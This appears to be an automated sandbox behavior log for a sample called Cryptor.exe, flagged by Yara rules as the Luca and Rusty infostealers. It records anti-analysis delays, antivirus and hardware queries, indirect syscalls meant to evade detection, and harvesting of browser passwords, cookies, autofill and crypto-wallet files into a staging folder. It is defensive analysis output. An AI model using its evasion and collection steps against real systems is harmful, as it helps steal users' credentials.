Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2874			Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3954			Jump to behavior

Source: C:\Users\user\Desktop\Cryptor.exe TID: 6428	Thread sleep time: -35000s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7288	Thread sleep count: 2874 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7288	Thread sleep count: 3954 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7336	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7312	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\Cryptor.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT SerialNumber FROM Win32_BaseBoard

Source: C:\Users\user\Desktop\Cryptor.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT Name FROM Win32_Processor

Source: C:\Users\user\Desktop\Cryptor.exe	Thread delayed: delay time: 35000	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AC\	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Packages\adobe.acrobatreaderdc.protectedmode\AC\	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	File opened: C:\Users\user\AppData\Local\Packages\c5e2524a-ea46-4f67-841f-6a9465d9d515_cw5n1h2txyewy\AppData\	Jump to behavior

Source: Cryptor.exe, 00000000.00000003.1816751738.0000020DA5BD3000.00000004.00000020.00020000.00000000.sdmp, Cryptor.exe, 00000000.00000003.1816891652.0000020DA5BEC000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlloo

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Users\user\Desktop\Cryptor.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Users\user\Desktop\Cryptor.exe	NtReadFile: Indirect: 0x7FF6211E52C7			Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	NtWriteFile: Indirect: 0x7FF6211DDB77			Jump to behavior

Source: C:\Users\user\Desktop\Cryptor.exe

Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "[Console]::OutputEncoding = [System.Text.Encoding]::UTF8; Get-Culture | Select -ExpandProperty DisplayName"

Jump to behavior

Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\AppData\Roaming VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\AppData\Local VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\AppData\Local\CEF\User Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Local State VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Web Data VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\Desktop VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\Desktop\Cryptor.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\Desktop\desktop.ini VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\Desktop\DVWHKMNFNN.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\Desktop\DVWHKMNFNN.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\Desktop\Excel.lnk VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\Desktop\HTAGVDFUIE.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\Desktop\HTAGVDFUIE.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\Desktop\KATAXZVCPS.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\Desktop\KATAXZVCPS.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\Desktop\KZWFNRXYKI.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\Desktop\KZWFNRXYKI.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\Desktop\LTKMYBSEYZ.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\Desktop\LTKMYBSEYZ.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\Desktop\UMMBDNEQBN.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\Desktop\UMMBDNEQBN.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\Desktop\UMMBDNEQBN.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\Desktop\UMMBDNEQBN.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\Desktop\VLZDGUKUTZ.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\Desktop\VLZDGUKUTZ.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\Desktop\WUTJSCBCFX.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\Desktop\WUTJSCBCFX.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\Desktop\ZBEDCJPBEY.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\Documents VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\Documents VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\Documents\desktop.ini VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\Documents\DVWHKMNFNN.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\Documents\HTAGVDFUIE.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\Documents\HTAGVDFUIE.jpg VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\Documents\HTAGVDFUIE.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\Documents\HTAGVDFUIE.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\Documents\KATAXZVCPS.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\Documents\KATAXZVCPS.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\Documents\KZWFNRXYKI.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\Documents\LTKMYBSEYZ.mp3 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\Documents\LTKMYBSEYZ.pdf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\Documents\UMMBDNEQBN.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\Documents\UMMBDNEQBN.docx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\Documents\UMMBDNEQBN.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\Documents\UMMBDNEQBN.xlsx VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\000003.log VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\GUSNUBAIEi2BKK2Fv27qNATlfJxDpw\Autofill VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\GUSNUBAIEi2BKK2Fv27qNATlfJxDpw\screen1.png VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\GUSNUBAIEi2BKK2Fv27qNATlfJxDpw\sensitive-files.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\GUSNUBAIEi2BKK2Fv27qNATlfJxDpw\user_info.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\GUSNUBAIEi2BKK2Fv27qNATlfJxDpw\user_info.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\GUSNUBAIEi2BKK2Fv27qNATlfJxDpw\Wallets VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\GUSNUBAIEi2BKK2Fv27qNATlfJxDpw\Passwords\Chrome_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\GUSNUBAIEi2BKK2Fv27qNATlfJxDpw\Passwords\Chrome_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\GUSNUBAIEi2BKK2Fv27qNATlfJxDpw\Passwords\Edge_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\GUSNUBAIEi2BKK2Fv27qNATlfJxDpw\Passwords\Edge_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\GUSNUBAIEi2BKK2Fv27qNATlfJxDpw\Passwords\Firefox_qnq0haq7.default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\GUSNUBAIEi2BKK2Fv27qNATlfJxDpw\Passwords\Firefox_qnq0haq7.default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\GUSNUBAIEi2BKK2Fv27qNATlfJxDpw\History\Chrome_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\GUSNUBAIEi2BKK2Fv27qNATlfJxDpw\History\Chrome_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\GUSNUBAIEi2BKK2Fv27qNATlfJxDpw\History\Edge_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\GUSNUBAIEi2BKK2Fv27qNATlfJxDpw\History\Edge_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\GUSNUBAIEi2BKK2Fv27qNATlfJxDpw\History\Firefox_qnq0haq7.default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\GUSNUBAIEi2BKK2Fv27qNATlfJxDpw\History\Firefox_qnq0haq7.default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\GUSNUBAIEi2BKK2Fv27qNATlfJxDpw\Downloads\Chrome_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\GUSNUBAIEi2BKK2Fv27qNATlfJxDpw\Downloads\Chrome_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\GUSNUBAIEi2BKK2Fv27qNATlfJxDpw\Downloads\Edge_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\GUSNUBAIEi2BKK2Fv27qNATlfJxDpw\Downloads\Edge_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\GUSNUBAIEi2BKK2Fv27qNATlfJxDpw\Downloads\Firefox_qnq0haq7.default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\GUSNUBAIEi2BKK2Fv27qNATlfJxDpw\Cookies\Chrome_Default_Network.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\GUSNUBAIEi2BKK2Fv27qNATlfJxDpw\Cookies\Edge_Default_Network.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\GUSNUBAIEi2BKK2Fv27qNATlfJxDpw\Cookies\Edge_Default_Network.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\GUSNUBAIEi2BKK2Fv27qNATlfJxDpw\Cookies\Firefox_qnq0haq7.default_Network.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\GUSNUBAIEi2BKK2Fv27qNATlfJxDpw\Autofill\Chrome_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\GUSNUBAIEi2BKK2Fv27qNATlfJxDpw\Autofill\Edge_Default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\GUSNUBAIEi2BKK2Fv27qNATlfJxDpw\Autofill\Firefox_qnq0haq7.default.txt VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Cryptor.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\out.zip VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Cryptor.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\Cryptor.exe

WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT displayName FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected Luca Stealer

Source: Yara match	File source: 0.2.Cryptor.exe.7ff620fa0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1818390971.00007FF6213B0000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1816751738.0000020DA5C09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1817452314.0000020DA5C09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1816891652.0000020DA5C09000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Cryptor.exe PID: 6388, type: MEMORYSTR

Yara detected Rusty Stealer

Source: Yara match

File source: Process Memory Space: Cryptor.exe PID: 6388, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: Cryptor.exe, 00000000.00000003.1720087250.0000020DA5C55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: Electrum
Source: Cryptor.exe, 00000000.00000003.1712946947.0000020DA5C55000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: %APPDATA%\Electrum\wallets\
